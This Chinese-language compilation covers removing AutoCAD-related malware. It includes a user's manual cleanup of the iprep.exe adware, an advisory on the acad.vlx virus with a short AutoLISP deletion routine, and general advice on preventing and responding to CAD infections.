典型症状是在WINDOWS根目录中存在iprep.EXE SYSTEM 32文件夹中有fsutk.dll和liprip.dll和rimon.dll而且会发现如果不先改注册表无法删除或粉碎iprep.EXE我用了如下软件配合本次清除工作：最新版的瑞星卡卡，安全卫士360，优化大师的流氓软件清除大师。

1和大部分朋友一样我也是下载安装AUTOCAD 2007 后中的，所以首先卸载它。

重启。

2按F8进入安全模式开始运行输入 REGEDIT 调出注册表编辑器编辑查找（建议勾选全部复选框）输入iprep 注意右侧栏的查找结果会找到包括iprep.EXE nwsapagent.dll在内的几个结果（好像还有INF文件）删除右栏全部搜索结果。

再编辑查找输入liprip 本次搜索结果应该在左边栏，直接删除这个找到的文件夹。

自此手工注册表修改删除IPREP完成。

3到WINDOWS根目录中删除iprep.EXE 没有再生成。

4打开卡卡高级功能插件管理及卸载看到有两项和liprip iprep 有关的插件。

卸载它们。

5打开360 常用系统全面诊断在安全模式中当前运行的进程应该全部是安全标记，看从注册表中自动启动的程序找到“SAFEST”和“SCRRSAVE”(好像是这个名子，因为没有历史记录是凭印象的）可能还有一个RUNDLL32这三项360给出的是未知安全级别，旁边已经给出了详细的文件路径和注册表路径，先去注册表编辑器查找和删除对应的注册表项再删除对应文件。

问题AutoCAD系列产品的用户报告了一个名为acad.vlx的恶意文件，该文件会导致绘图损坏。

解决方法这实际上不是Autodesk提供的AutoCAD文件。

当AutoCAD载入acad.vlx恶意文件时，会使绘图损坏，进而导致在您保存并重新打开工程图时弹出“缺少语言包”（Missing Language Pack ）对话框。

acad.vlx文件会在Help文件夹下面创建一个副本（例如，C:\ProgramFiles\AutoCAD 2010\Help\logo.gif）。

其它多个文件也会被修改，同时ACADLSPASDOC系统变量的值会被改为1，这将允许acad.vlx文件载入到其它打开的工程图中，导致工程图损坏。

下述清理流程将在AutoCAD试图加载acad.vlx 文件之前发现该文件并将其删除，防止病毒的传播。

为了避免其它文件的损坏您必须以Microsoft® Windows® 操作系统的系统管理员身份完成本流程。

1. 在您的产品安装目录中，找到Support 文件夹（例如，C:\ProgramFiles\AutoCAD 2010\Support）。

2. 在Support文件夹内，双击acad20xx.lsp文件（例如，acad2010.lsp文件）。

在文件中加入下面的代码。

AutoCAD将发现并删除acad.vlx和logo.gif 文件。

(defun cleanvirus( / lspfiles lspfile x)(setq lspfiles '("acad.vlx" "logo.gif"))(foreach lspfile lspfiles(while (setq x (findfile lspfile))(progn(vl-file-delete x)(princ "\nDeleted file ")(princ x));progn);while);foreach)(cleanvirus)3. 打开下面的所有文件：o C:\Program Files\AutoCAD 20xx\Express\acetauto.lspo C:\Program Files\AutoCAD 20xx\Support\ai_utils.lspo ROAMABLEROOTPREFIX\Support\acad.mnlo备注：将ROAMABLEROOTPREFIX替换为ROAMABLEROOTPREFIX 系统变量的返回值。

CAD中毒解决方案概述：CAD中毒是指计算机辅助设计软件（CAD）受到恶意软件或病毒的感染，导致软件运行异常或无法正常使用的问题。

本文将介绍CAD中毒的解决方案，包括防范措施和应急处理方法。

一、防范措施：1. 安装可信赖的CAD软件：选择正版软件或从官方网站下载软件，避免从不明来源或盗版网站下载CAD软件，以防感染恶意软件。

2. 及时更新软件：定期检查CAD软件的更新，及时安装最新的补丁和安全更新，以修复已知漏洞，提高软件的安全性。

3. 安装杀毒软件：选择一款可靠的杀毒软件，并保持其及时更新。

定期进行全盘扫描，以发现并清除潜在的恶意软件。

4. 谨慎打开附件：在收到来自不熟悉或可疑来源的电子邮件时，不要随意打开附件。

恶意软件常常通过电子邮件附件传播，点击或下载附件可能导致CAD中毒。

5. 建立安全意识：加强员工的安全意识培训，教育员工不随意下载和安装软件，不打开可疑链接和附件，以及如何识别和报告潜在的安全威胁。

二、应急处理方法：1. 断开网络连接：一旦发现CAD中毒的迹象，立即断开计算机与网络的连接，以防止恶意软件进一步传播和损害系统。

2. 使用杀毒软件进行扫描：如果已经安装了杀毒软件，运行全盘扫描以查找和清除恶意软件。

如果没有安装杀毒软件，可以使用可信赖的在线杀毒工具进行扫描和清除。

3. 恢复系统：如果发现CAD软件无法正常运行，可以尝试使用系统还原功能将计算机恢复到之前的正常状态。

如果系统还原无效，可以考虑重新安装CAD软件。

4. 密切关注系统行为：在CAD中毒后，密切关注计算机的行为，包括异常弹窗、系统崩溃、文件损坏等。

及时记录并报告这些异常行为，以便进一步分析和解决问题。

5. 寻求专业帮助：如果自行处理无效或不熟悉恶意软件的处理方法，建议寻求专业的计算机安全服务提供商或技术支持人员的帮助。

他们可以提供更专业的解决方案和支持。

总结：CAD中毒是一种常见的计算机安全问题，但通过采取防范措施和及时应对，可以最大程度地减少CAD中毒的风险。